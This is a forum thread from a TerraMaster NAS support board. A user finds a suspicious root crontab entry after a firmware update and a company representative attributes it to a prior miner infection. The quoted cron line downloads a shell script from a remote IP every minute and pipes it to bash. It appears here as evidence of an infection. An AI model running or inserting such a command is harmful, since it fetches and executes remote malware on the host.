Hi All,
I noticed the following as my root crontab:
root@NAS:/var/spool/cron/crontabs# cat root
* * * * * wget -q -O - http://195.3.146.118/tr.sh | bash > /dev/null 2>&1
0 12 * * * ntpdate time-a.nist.gov
The crontab was edited at the same time as my last update of the TNAS firmware/software!!! (The cron file date and time is the same as the OS files and folder structures that were updated - this did not happen "after" the update).
This currently appears to be a piece of "attempted" malware that came from TerraMaster during the upgrade process!!
I am now investigating the system and will have to perform more details analysis to ensure there are no other infections.
Why would TerraMaster not inform registered customers of this infection?
I will be posting this on larger global forums as I complete my own investigation, but please people - take precautions!!!!!!!
MALWARE from TNAS Upgrade?
Re: MALWARE from TNAS Upgrade?
I am sorry to tell you, obviously, your device is infected by the miner virus. The TerraMaster software update package is unlikely to contain malicious viruses. We have malicious virus protection measures and check methods.It is very likely that your system was infected before the update.
here is an article as a possible solution for your reference: https://www.linkedin.com/pulse/kinsing- ... amul-patel
here is an article as a possible solution for your reference: https://www.linkedin.com/pulse/kinsing- ... amul-patel
To contact our team, please send email to following addresses, remember to replace (at) with @:
Support team: support(at)terra-master.com (for technical support only)
Service team: service(at)terra-master.com (for purchasing, return, replacement, RMA service)
Support team: support(at)terra-master.com (for technical support only)
Service team: service(at)terra-master.com (for purchasing, return, replacement, RMA service)
Re: MALWARE from TNAS Upgrade?
{L_BUTTON_AT}davidroynl
I just have confirmation from our tech team, they checked again our recent update packages, no any malware found. You need to stop immediately such nonsense speaking, the malware does not come from TNAS updates.
To contact our team, please send email to following addresses, remember to replace (at) with @:
Support team: support(at)terra-master.com (for technical support only)
Service team: service(at)terra-master.com (for purchasing, return, replacement, RMA service)
Support team: support(at)terra-master.com (for technical support only)
Service team: service(at)terra-master.com (for purchasing, return, replacement, RMA service)
- davidroynl
- Posts: 4
- Joined: 28 Jun 2021, 22:34
Re: MALWARE from TNAS Upgrade?
Interesting for sure that the malware made it to a machine that has no internet access. There has been very little information provided to end users on this "trend" of TNAS devices being infected, and so I do absolutely hold the company partially responsible for multiple reasons, the most of which is lack of communication on a known issue, and secondly, no actions taken to help regular users remove and prevent infection.
Only TNAS has an ability to reach all owners of TNAS devices and rectify this. MOST users are not able to look for infection, or figure out how to clean it from an infected device.
Passing the buck and ignoring the problem is not an appropriate response.
Only TNAS has an ability to reach all owners of TNAS devices and rectify this. MOST users are not able to look for infection, or figure out how to clean it from an infected device.
Passing the buck and ignoring the problem is not an appropriate response.
Re: MALWARE from TNAS Upgrade?
Well, the miner malware is a kind of virus, it does not matter if your tnas connect with internet or not. it spreads in various ways, it can get into an environment’s network through everyday activities like:
. Exchanging data between devices
. Visiting infected websites (a device can get infected even without downloading files)
. Downloading torrent files or other free software
. Using external storage devices (like USB drives) that were previously connected to an infected computer
. Opening infected email attachments
So I have no idea how you got your TNAS infected, besides of providing you reference article with solution, we can do nothing else for you. I think it is fair enough.
. Exchanging data between devices
. Visiting infected websites (a device can get infected even without downloading files)
. Downloading torrent files or other free software
. Using external storage devices (like USB drives) that were previously connected to an infected computer
. Opening infected email attachments
So I have no idea how you got your TNAS infected, besides of providing you reference article with solution, we can do nothing else for you. I think it is fair enough.
To contact our team, please send email to following addresses, remember to replace (at) with @:
Support team: support(at)terra-master.com (for technical support only)
Service team: service(at)terra-master.com (for purchasing, return, replacement, RMA service)
Support team: support(at)terra-master.com (for technical support only)
Service team: service(at)terra-master.com (for purchasing, return, replacement, RMA service)